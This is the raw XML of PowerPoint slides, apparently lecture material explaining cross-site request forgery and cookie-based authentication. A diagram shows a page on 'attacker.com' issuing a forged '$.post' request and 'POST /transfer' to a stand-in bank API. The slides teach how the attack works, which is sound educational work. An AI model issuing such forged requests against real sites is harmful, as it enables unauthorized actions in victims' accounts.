            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="Oval 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8069C54A-965B-6B35-2487-987FEC1CC7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893" y="0"/>
              <a:ext cx="169653" cy="165758"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F5D328"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="25400" tIns="25400" rIns="25400" bIns="25400" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1pPr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1pPr>
              <a:lvl2pPr marL="742950" indent="-28575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2pPr>
              <a:lvl3pPr marL="11430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3pPr>
              <a:lvl4pPr marL="16002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4pPr>
              <a:lvl5pPr marL="20574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5pPr>
              <a:lvl6pPr marL="25146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6pPr>
              <a:lvl7pPr marL="29718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7pPr>
              <a:lvl8pPr marL="34290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8pPr>
              <a:lvl9pPr marL="38862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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr defTabSz="2921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0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Gill Sans" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
                <a:sym typeface="Gill Sans" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46089" name="Oval 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFE4009A-AF45-3266-1A68-01E2FF8B0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69654" cy="165758"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C82506"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="25400" tIns="25400" rIns="25400" bIns="25400" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1pPr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1pPr>
              <a:lvl2pPr marL="742950" indent="-28575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2pPr>
              <a:lvl3pPr marL="11430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3pPr>
              <a:lvl4pPr marL="16002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4pPr>
              <a:lvl5pPr marL="20574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5pPr>
              <a:lvl6pPr marL="25146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6pPr>
              <a:lvl7pPr marL="29718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7pPr>
              <a:lvl8pPr marL="34290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8pPr>
              <a:lvl9pPr marL="38862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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr defTabSz="2921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0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Gill Sans" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
                <a:sym typeface="Gill Sans" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46090" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D8DB82C-61E7-C190-54EF-FCA4DC15308C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1724819" y="1833563"/>
            <a:ext cx="3724275" cy="25796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25400" tIns="25400" rIns="25400" bIns="25400" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr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29210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b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" charset="0"/>
              <a:ea typeface="Gill Sans" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
              <a:sym typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46088" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86B69B42-6015-9798-6CAB-32668DF634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525" y="1878013"/>
            <a:ext cx="191294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6092" name="Line 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CA49F59-A578-3C32-F00C-1C71C2B3866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81032" y="2559844"/>
            <a:ext cx="2286000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="101600" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1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defTabSz="29210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000" b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" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:ea typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:cs typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:sym typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A5A01FE-DFE6-90C2-3A26-C851FE11A3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569" y="1669257"/>
            <a:ext cx="529431" cy="63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6091" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60CF7E5E-3717-0FDC-FCFC-A3DC666DC138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5936457" y="1778186"/>
            <a:ext cx="1185517" cy="34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 defTabSz="22860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500" b="0">
                <a:latin typeface="Monaco" charset="0"/>
                <a:ea typeface="Monaco" charset="0"/>
                <a:cs typeface="Monaco" charset="0"/>
                <a:sym typeface="Monaco" charset="0"/>
              </a:rPr>
              <a:t>POST /transfer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Box 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8B4D3A3-8CB8-75A6-ABAC-5345E887B267}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9763290" y="2485852"/>
            <a:ext cx="1279197" cy="282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00"/>
              <a:t>api.bank.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46093" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5B916AD-40E5-907F-8A13-BBA9FB0D27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650" y="1797050"/>
            <a:ext cx="258763" cy="257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6094" name="Text Box 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CD381AB-3885-CC98-6B20-95AFB5505B6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1734063" y="1821483"/>
            <a:ext cx="1230080" cy="282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00"/>
              <a:t>attacker.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46095" name="Text Box 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D0D3702-7A18-01C8-6342-F18D0528380C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1252538" y="2346978"/>
            <a:ext cx="4219104" cy="259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50" b="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>$.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1350">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1350" b="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>({url: “api.bank.com/account“, …})</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46096" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06622549-270D-8248-2FE4-793D735C9B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9957" y="1797050"/>
            <a:ext cx="257969" cy="257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6097" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84C4811C-B7D3-877E-2D9B-9E05D9DCF9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0" y="2264569"/>
            <a:ext cx="590550" cy="5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6098" name="Rectangle 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50415E18-D8CB-8A2A-91B3-4BF3E407D07A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892175" y="3407569"/>
            <a:ext cx="10406857" cy="1838325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="228600" eaLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2250">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-site request forgery (CSRF) attacks are a type of web exploit where a website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2250" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>transmits unauthorized commands </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2250">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
              </a:rPr>
              <a:t>as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2250"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2250">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
              </a:rPr>
              <a:t> that the web app trusts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="228600" eaLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2250">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="228600" eaLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2250">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In a CSRF attack, a user is tricked into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2250" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>submitting an unintended </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2250" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2250" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(often unrealized) web request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2250">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to a website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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F3B1425-BCA0-2115-B357-FE79609A578A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844550" y="172244"/>
            <a:ext cx="10502900" cy="1143000"/>
          </a:xfrm>
        </p:spPr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Cookie-Based Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48130" name="AutoShape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF0F5E2-666C-57AC-BB2D-95CA7C9E5BB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="860425" y="1460500"/>
            <a:ext cx="10471150" cy="1512094"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4935"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FF9300"/>
            </a:solidFill>
            <a:miter lim="4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41275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b="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue Medium" charset="0"/>
              <a:ea typeface="Helvetica Neue Medium" charset="0"/>
              <a:cs typeface="Helvetica Neue Medium" charset="0"/>
              <a:sym typeface="Helvetica Neue Medium" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48131" name="Line 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F295AD93-8F2A-9955-2D1C-18A7ECF738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8200" y="2070894"/>
            <a:ext cx="3268663" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="762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0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1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defTabSz="29210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000" b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" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:ea typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:cs typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:sym typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48132" name="AutoShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EB31337-66B8-2098-2AB2-A073BB2F7CD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1069975" y="1651794"/>
            <a:ext cx="4568032" cy="1130300"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8690"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng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>
            <a:outerShdw blurRad="50800" dist="25400" dir="3599997" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="25400" tIns="25400" rIns="25400" bIns="25400" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr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29210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b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" charset="0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48133" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3256D81-45CA-1857-211D-75533A363A02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1089025" y="1662907"/>
            <a:ext cx="4529932" cy="5151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0" y="4117"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="2980"/>
                  <a:pt x="52" y="1951"/>
                  <a:pt x="136" y="1206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="220" y="461"/>
                  <a:pt x="336" y="0"/>
                  <a:pt x="464" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21136" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21264" y="0"/>
                  <a:pt x="21380" y="461"/>
                  <a:pt x="21464" y="1206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21548" y="1951"/>
                  <a:pt x="21600" y="2980"/>
                  <a:pt x="21600" y="4117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CDEE0"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="25400" tIns="25400" rIns="25400" bIns="25400" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1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defTabSz="29210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950" b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panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:ea typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:cs typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:sym typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48134" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11D7E792-EED7-F809-2B7C-77BF071D6619}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1162050" y="1878807"/>
            <a:ext cx="426244" cy="82550"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="851440" cy="165758"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48135" name="Oval 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEC3E183-E124-4415-27E2-7AB6BB01A4B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786" y="0"/>
              <a:ext cx="169654" cy="165758"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00882B"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="25400" tIns="25400" rIns="25400" bIns="25400" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1pPr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1pPr>
              <a:lvl2pPr marL="742950" indent="-28575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2pPr>
              <a:lvl3pPr marL="11430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3pPr>
              <a:lvl4pPr marL="16002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4pPr>
              <a:lvl5pPr marL="20574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5pPr>
              <a:lvl6pPr marL="25146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6pPr>
              <a:lvl7pPr marL="29718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7pPr>
              <a:lvl8pPr marL="34290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8pPr>
              <a:lvl9pPr marL="38862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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr defTabSz="2921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0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Gill Sans" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
                <a:sym typeface="Gill Sans" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="Oval 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{818BADFC-1E11-D418-A525-D54566A87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893" y="0"/>
              <a:ext cx="169653" cy="165758"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F5D328"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="25400" tIns="25400" rIns="25400" bIns="25400" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1pPr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1pPr>
              <a:lvl2pPr marL="742950" indent="-28575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2pPr>
              <a:lvl3pPr marL="11430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3pPr>
              <a:lvl4pPr marL="16002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4pPr>
              <a:lvl5pPr marL="20574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5pPr>
              <a:lvl6pPr marL="25146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6pPr>
              <a:lvl7pPr marL="29718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7pPr>
              <a:lvl8pPr marL="34290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8pPr>
              <a:lvl9pPr marL="38862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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr defTabSz="2921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0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Gill Sans" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
                <a:sym typeface="Gill Sans" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48137" name="Oval 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7506F302-A3EE-66BD-847E-1F1FDE0B0D4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69654" cy="165758"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C82506"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="25400" tIns="25400" rIns="25400" bIns="25400" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1pPr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1pPr>
              <a:lvl2pPr marL="742950" indent="-28575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2pPr>
              <a:lvl3pPr marL="11430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3pPr>
              <a:lvl4pPr marL="16002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4pPr>
              <a:lvl5pPr marL="20574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5pPr>
              <a:lvl6pPr marL="25146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6pPr>
              <a:lvl7pPr marL="29718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7pPr>
              <a:lvl8pPr marL="34290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8pPr>
              <a:lvl9pPr marL="38862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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr defTabSz="2921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0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Gill Sans" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
                <a:sym typeface="Gill Sans" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48138" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0B6ABEC-438A-6CE2-A04F-E0030F167790}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1724819" y="1790700"/>
            <a:ext cx="3724275" cy="25796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25400" tIns="25400" rIns="25400" bIns="25400" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr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29210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b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" charset="0"/>
              <a:ea typeface="Gill Sans" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
              <a:sym typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48136" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{853E157D-7752-0489-E31D-A6043777F2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525" y="1835944"/>
            <a:ext cx="191294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8140" name="Line 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{272531D2-9F54-01AA-3C29-1D54FAEB88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81032" y="2516982"/>
            <a:ext cx="2286000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="101600" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1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defTabSz="29210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000" b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" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:ea typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:cs typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:sym typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FA0660F-E2B0-1115-AAA4-33FFA62BA9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569" y="1627188"/>
            <a:ext cx="529431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8139" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
